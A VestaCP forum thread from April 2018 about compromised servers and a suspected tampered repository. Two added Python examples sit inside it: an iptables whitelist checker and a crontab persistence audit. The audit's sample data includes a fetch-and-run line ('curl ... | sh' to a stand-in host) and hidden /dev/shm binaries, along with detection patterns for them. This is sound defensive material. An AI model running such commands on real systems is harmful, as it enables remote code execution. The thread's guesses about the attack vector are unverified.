Vesta Control Panel - Forum

Got 10 VestaCP servers exploited

General questions about VestaCP
kobo1d
Posts: 47
Joined: Sun Nov 27, 2016 7:59 pm

Re: Got 10 VestaCP servers exploited

Post by kobo1d » Mon Apr 09, 2018 12:22 pm

bruce7890 wrote: ↑
Mon Apr 09, 2018 12:18 pm
kobo1d wrote: ↑
Mon Apr 09, 2018 12:13 pm
or limit access to port 8083 using firewall
no, that's not working. I got infected while this port was only available to my IP!!
Are you sure? I thought this was all about 8083 being publicly available?
doesn't matter. do a

Code:

service vesta stop
until the update of vestacp is working again.
blocking the port won't help you, I got hacked with a closed port.

RevengeFNF
Posts: 92
Joined: Sat Aug 02, 2014 6:50 pm

Os: CentOS 6x
Web: nginx + php-fpm
Re: Got 10 VestaCP servers exploited

Post by RevengeFNF » Mon Apr 09, 2018 12:28 pm

kobo1d wrote: ↑
Mon Apr 09, 2018 12:22 pm
bruce7890 wrote: ↑
Mon Apr 09, 2018 12:18 pm
kobo1d wrote: ↑
Mon Apr 09, 2018 12:13 pm


no, that's not working. I got infected while this port was only available to my IP!!
Are you sure? I thought this was all about 8083 being publicly available?
doesn't matter. do a

Code:

service vesta stop
until the update of vestacp is working again.
blocking the port won't help you, I got hacked with a closed port.
How did you get hacked if the port was closed? With the port closed, there is no access to the Web UI.

If that is true, the only way I am seeing it is that the Vesta repositories were hacked and people installed an exploited version of Vesta.

When did you install your VestaCP?

kobo1d
Posts: 47
Joined: Sun Nov 27, 2016 7:59 pm

Re: Got 10 VestaCP servers exploited

Post by kobo1d » Mon Apr 09, 2018 12:34 pm

wrote: How did you get hacked if the port was closed? With the port closed, there is no access to the Web UI.

If that is true, the only way I am seeing it is that the Vesta repositories were hacked and people installed an exploited version of Vesta.

When did you install your VestaCP?
yes, that's how the hack is working. it is installed hidden and leaves no logs on the server. (via repo)
I have rkhunter, chkrootkit, clamav, iptables, fail2ban and aide.
none of them reacted, so it was installed internally and got past every one of the security mechanisms.
I installed vesta about 10 days ago on this brand new, fresh server.
its SSH is secured by pubkey, no root login allowed
vesta webui forced to listen to my IP only (tested and working)
parent ID of the virus was 1 (systemd)

ALSO I get email on SSH logins. no mails were sent during this time.

and I guess that's why their repo is down now and you can't update currently
Last edited by kobo1d on Mon Apr 09, 2018 12:37 pm, edited 5 times in total.

pipoy
Posts: 112
Joined: Mon Sep 11, 2017 8:02 am

Os: CentOS 6x
Web: apache
Re: Got 10 VestaCP servers exploited

Post by pipoy » Mon Apr 09, 2018 12:35 pm

bruce7890 wrote: ↑
Mon Apr 09, 2018 12:18 pm
kobo1d wrote: ↑
Mon Apr 09, 2018 12:13 pm
or limit access to port 8083 using firewall
no, that's not working. I got infected while this port was only available to my IP!!
Are you sure? I thought this was all about 8083 being publicly available?
I have a different port. Was hacked.

blackyangell
Posts: 12
Joined: Mon May 19, 2014 6:11 am

Os: CentOS 6x
Web: nginx + php-fpm
Re: Got 10 VestaCP servers exploited

Post by blackyangell » Mon Apr 09, 2018 12:37 pm

fedekrum wrote: ↑
Mon Apr 09, 2018 10:14 am
I have just tried to make a new vesta server on Digital Ocean, Ubuntu 16 and got these errors during install.

Hit:1 http://apt.vestacp.com/xenial xenial InRelease
Hit:2 http://security.ubuntu.com/ubuntu xenial-security InRelease
Hit:3 https://repos.sonar.digitalocean.com/apt main InRelease
Hit:4 http://nginx.org/packages/mainline/ubuntu xenial InRelease
Hit:5 http://nyc2.mirrors.digitalocean.com/ubuntu xenial InRelease
Hit:6 http://nyc2.mirrors.digitalocean.com/ubuntu xenial-updates InRelease
Hit:7 http://nyc2.mirrors.digitalocean.com/ubuntu xenial-backports InRelease
Reading package lists... Done
Reading package lists... Done
Building dependency tree
Reading state information... Done
E: Unable to locate package vesta-php
E: Unable to locate package vesta-ioncube
E: Unable to locate package vesta-softaculous
Error: apt-get install failed

Do you think it has to do with this hack or the patch released?

Does anybody know some workaround for this?
Have the same problem on DigitalOcean, Ubuntu.

kobo1d
Posts: 47
Joined: Sun Nov 27, 2016 7:59 pm

Re: Got 10 VestaCP servers exploited

Post by kobo1d » Mon Apr 09, 2018 12:37 pm

blackyangell wrote: ↑
Mon Apr 09, 2018 12:37 pm
fedekrum wrote: ↑
Mon Apr 09, 2018 10:14 am
I have just tried to make a new vesta server on Digital Ocean, Ubuntu 16 and got these errors during install.

Hit:1 http://apt.vestacp.com/xenial xenial InRelease
Hit:2 http://security.ubuntu.com/ubuntu xenial-security InRelease
Hit:3 https://repos.sonar.digitalocean.com/apt main InRelease
Hit:4 http://nginx.org/packages/mainline/ubuntu xenial InRelease
Hit:5 http://nyc2.mirrors.digitalocean.com/ubuntu xenial InRelease
Hit:6 http://nyc2.mirrors.digitalocean.com/ubuntu xenial-updates InRelease
Hit:7 http://nyc2.mirrors.digitalocean.com/ubuntu xenial-backports InRelease
Reading package lists... Done
Reading package lists... Done
Building dependency tree
Reading state information... Done
E: Unable to locate package vesta-php
E: Unable to locate package vesta-ioncube
E: Unable to locate package vesta-softaculous
Error: apt-get install failed

Do you think it has to do with this hack or the patch released?

Does anybody know some workaround for this?
Have the same problem on DigitalOcean, Ubuntu.
wait until they fixed their repo. it's down because the virus was spread from over there

Falzo
Posts: 60
Joined: Mon Mar 28, 2016 8:49 am

Re: Got 10 VestaCP servers exploited

Post by Falzo » Mon Apr 09, 2018 12:37 pm

kobo1d wrote: ↑
Mon Apr 09, 2018 12:22 pm
blocking the port won't help you, I got hacked with a closed port.
how certain of that are you? while it's true that the default policy is DROP, did you actually CHECK if the change to that rule got reflected by iptables and really blocked access from foreign IPs?

so far you are the only one to be hacked while claiming to have had that port closed/whitelisted. no offense meant, but a single occurrence could also point to a flaw in your setup/firewall ;-)
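Falzo's question above, whether the whitelist rule for 8083 is really what iptables ends up enforcing, can be partly answered offline from the output of `iptables -S`. The block below is an added example and is not code from the thread, from VestaCP or from any real host: it parses a constructed rule dump (the admin address 203.0.113.5, the probe addresses and the `vesta` chain are assumptions), simulates first-match evaluation for a new inbound TCP packet, and reports which probe sources would reach port 8083 without being whitelisted. The second, "leaky" ruleset shows the usual way such a whitelist fails: an older, broader ACCEPT for the same port sits above it and wins. Only `-s`, `-p`, `-i`, `--dport`, `--state`/`--ctstate` and jumps into user-defined chains are modelled, so this is a sanity check on rule order, not a replacement for probing from a foreign host.

```python
import ipaddress
import shlex

# Constructed sample of `iptables -S` output (assumption, not from the thread):
# INPUT drops by default, TCP/8083 is whitelisted to a single admin address.
RULES_WHITELISTED = """\
-P INPUT DROP
-P FORWARD DROP
-P OUTPUT ACCEPT
-N vesta
-A INPUT -i lo -j ACCEPT
-A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A INPUT -j vesta
-A vesta -p tcp -m tcp --dport 22 -j ACCEPT
-A vesta -s 203.0.113.5/32 -p tcp -m tcp --dport 8083 -j ACCEPT
-A vesta -p tcp -m tcp --dport 80 -j ACCEPT
"""

# Same ruleset, but a broad ACCEPT for 8083 survived above the whitelist.
# First match wins, so the whitelist below it never fires.
RULES_LEAKY = RULES_WHITELISTED.replace(
    "-A vesta -p tcp -m tcp --dport 22 -j ACCEPT\n",
    "-A vesta -p tcp -m tcp --dport 22 -j ACCEPT\n"
    "-A vesta -p tcp -m tcp --dport 8083 -j ACCEPT\n",
)

TERMINAL = {"ACCEPT", "DROP", "REJECT"}


def parse_rules(text):
    """Parse `iptables -S` style output into {"policy": {...}, "chains": {...}}."""
    policy, chains = {}, {}
    for line in text.splitlines():
        tok = shlex.split(line)
        if not tok:
            continue
        if "!" in tok:  # negated matches are not modelled; refuse rather than guess
            raise ValueError(f"negated match not supported: {line}")
        if tok[0] == "-P":
            policy[tok[1]] = tok[2]
            continue
        if tok[0] == "-N":
            chains.setdefault(tok[1], [])
            continue
        if tok[0] != "-A":
            continue
        rule, i = {"target": None}, 2
        while i < len(tok):
            opt = tok[i]
            if opt == "-s":
                rule["src"] = ipaddress.ip_network(tok[i + 1], strict=False); i += 2
            elif opt == "-p":
                rule["proto"] = tok[i + 1]; i += 2
            elif opt == "-i":
                rule["iface"] = tok[i + 1]; i += 2
            elif opt == "--dport":
                rule["dport"] = int(tok[i + 1]); i += 2
            elif opt in ("--state", "--ctstate"):
                rule["states"] = set(tok[i + 1].split(",")); i += 2
            elif opt == "-j":
                rule["target"] = tok[i + 1]; i += 2
            elif opt == "-m":
                i += 2  # match-extension name; its options are handled above
            else:
                i += 1  # options this checker does not model are skipped
        chains.setdefault(tok[1], []).append(rule)
    return {"policy": policy, "chains": chains}


def _matches(rule, pkt):
    """True if every criterion the rule specifies holds for the packet."""
    if "src" in rule and ipaddress.ip_address(pkt["src"]) not in rule["src"]:
        return False
    if rule.get("proto") not in (None, "all", pkt["proto"]):
        return False
    if "iface" in rule and rule["iface"] != pkt["iface"]:
        return False
    if "dport" in rule and rule["dport"] != pkt["dport"]:
        return False
    if "states" in rule and pkt["state"] not in rule["states"]:
        return False
    return True


def _walk(ruleset, chain, pkt):
    """First-match evaluation of one chain; None means 'fell off the end'."""
    for rule in ruleset["chains"].get(chain, []):
        if not _matches(rule, pkt):
            continue
        t = rule["target"]
        if t in TERMINAL:
            return t
        if t == "RETURN":
            return None
        if t in ruleset["chains"]:  # jump into a user-defined chain
            v = _walk(ruleset, t, pkt)
            if v is not None:
                return v
        # LOG and other non-terminal targets: keep evaluating
    return None


def verdict(ruleset, src, dport, proto="tcp", iface="eth0"):
    """Fate of a new inbound packet: first terminal match, else the INPUT policy."""
    pkt = {"src": src, "dport": dport, "proto": proto, "iface": iface, "state": "NEW"}
    return _walk(ruleset, "INPUT", pkt) or ruleset["policy"].get("INPUT", "ACCEPT")


def audit_port(text, dport, allowed, probes):
    """Return the probe sources that reach `dport` without being in `allowed`."""
    rs = parse_rules(text)
    allowed_nets = [ipaddress.ip_network(a, strict=False) for a in allowed]
    return [
        src for src in probes
        if verdict(rs, src, dport) == "ACCEPT"
        and not any(ipaddress.ip_address(src) in n for n in allowed_nets)
    ]


if __name__ == "__main__":
    probes = ["203.0.113.5", "198.51.100.7", "192.0.2.44"]  # constructed: admin + two strangers
    for name, text in (("whitelisted", RULES_WHITELISTED), ("leaky", RULES_LEAKY)):
        leaks = audit_port(text, 8083, ["203.0.113.5"], probes)
        print(f"{name}: " + ("OK" if not leaks else "8083 reachable from " + ", ".join(leaks)))
```

To run it against a real box, replace the constructed text with the output of `iptables -S` and the allowed list with your own admin address; a non-empty result means a stranger's packet to 8083 hits an ACCEPT before the whitelist does, regardless of what the UI claims.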

kobo1d
Posts: 47
Joined: Sun Nov 27, 2016 7:59 pm

Re: Got 10 VestaCP servers exploited

Post by kobo1d » Mon Apr 09, 2018 12:39 pm

Falzo wrote: ↑
Mon Apr 09, 2018 12:37 pm
kobo1d wrote: ↑
Mon Apr 09, 2018 12:22 pm
blocking the port won't help you, I got hacked with a closed port.
how certain of that are you? while it's true that the default policy is DROP, did you actually CHECK if the change to that rule got reflected by iptables and really blocked access from foreign IPs?

so far you are the only one to be hacked while claiming to have had that port closed/whitelisted. no offense meant, but a single occurrence could also point to a flaw in your setup/firewall ;-)
you don't need to believe me. read my previous post: viewtopic.php?f=10&t=16556&start=320#p69046

you will see that I am right when vestacp posts public news about what was happening with their repo.

ebota
Posts: 3
Joined: Wed Oct 28, 2015 11:33 pm

Re: Got 10 VestaCP servers exploited

Post by ebota » Mon Apr 09, 2018 12:45 pm

DigitalOcean published advice and blocked the default port

https://www.digitalocean.com/community/ ... l-8th-2018

Falzo
Posts: 60
Joined: Mon Mar 28, 2016 8:49 am

Re: Got 10 VestaCP servers exploited

Post by Falzo » Mon Apr 09, 2018 12:46 pm

kobo1d wrote: ↑
Mon Apr 09, 2018 12:39 pm
Falzo wrote: ↑
Mon Apr 09, 2018 12:37 pm
kobo1d wrote: ↑
Mon Apr 09, 2018 12:22 pm
blocking the port won't help you, I got hacked with a closed port.
how certain of that are you? while it's true that the default policy is DROP, did you actually CHECK if the change to that rule got reflected by iptables and really blocked access from foreign IPs?

so far you are the only one to be hacked while claiming to have had that port closed/whitelisted. no offense meant, but a single occurrence could also point to a flaw in your setup/firewall ;-)
you don't need to believe me. read my previous post: viewtopic.php?f=10&t=16556&start=320#p69046

you will see that I am right when vestacp posts public news about what was happening with their repo.
will see about that. I have a server (Debian 9) freshly installed with vesta on April 2nd, port 8083 open, which wasn't hit nor affected at all. I haven't updated yet; feel free to give pointers for what I should look at and what you think the attack vector would be.

if there is something inside the sources which got spread through the repo, it still would need to be activated somehow... be it by a timer or an external call.
with the port blocked/whitelisted an external call is unlikely, so you'd bet on internal crons being manipulated or something like that?

as said, I am willing to dig deeper, as I have quite some installations of vesta; only two were affected. just give some more input on what you think would be worth looking out for.
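Falzo's hypothesis above, that whatever arrived via the repo would still need an internal trigger such as a manipulated cron, suggests a first triage pass over the cron tables. The block below is an added example and is not code from the thread, from VestaCP or from any real malware sample: the crontab text is constructed, and the three heuristics (jobs running out of /tmp, /var/tmp or /dev/shm; downloads piped straight into a shell; hidden path components) are generic persistence tells, not signatures of whatever hit these servers. It parses system-crontab format (five schedule fields or an `@reboot`-style shortcut, then a user, then a command) and returns every job that trips a heuristic, with the reason.

```python
import re

# Constructed sample in /etc/crontab format (assumption, not taken from any host):
# three ordinary jobs followed by three that should draw an analyst's eye.
SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
0 2 * * * root /usr/local/bin/nightly-backup.sh
*/2 * * * * root /dev/shm/.x/update >/dev/null 2>&1
0 3 * * * root curl -s http://example.invalid/p.sh | sh
@reboot root /var/tmp/.cache/run
"""

# schedule = five fields or an @shortcut, then the user, then the command
CRON_LINE = re.compile(
    r"^(?P<schedule>@\w+\s+|(?:\S+\s+){5})(?P<user>\S+)\s+(?P<command>.+)$"
)

CHECKS = [
    ("runs from a world-writable or temp directory",
     re.compile(r"(^|[\s=|;&(])/(?:tmp|var/tmp|dev/shm)/")),
    ("pipes a download straight into a shell",
     re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba|da|z)?sh\b")),
    ("hidden path component",
     re.compile(r"/\.[^/\s.]")),
]


def parse_crontab(text):
    """Return (line_no, user, command) for each job line; skip comments and VAR= lines."""
    jobs = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Z_]+=", line):
            continue
        m = CRON_LINE.match(line)
        if m:
            jobs.append((n, m.group("user"), m.group("command").strip()))
    return jobs


def audit_crontab(text):
    """Run every heuristic over every job; return the jobs that trip at least one."""
    findings = []
    for n, user, cmd in parse_crontab(text):
        reasons = [why for why, rx in CHECKS if rx.search(cmd)]
        if reasons:
            findings.append({"line": n, "user": user, "command": cmd, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {f['line']} ({f['user']}): {f['command']}")
        for why in f["reasons"]:
            print(f"    - {why}")
```

On a real host the same function can be fed /etc/crontab, each file under /etc/cron.d and, with the user column supplied separately, each spool under /var/spool/cron; a clean result says nothing about systemd timers or rc scripts, which need their own pass, and a hit is a lead to confirm against the file's mtime and package ownership, not a verdict.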
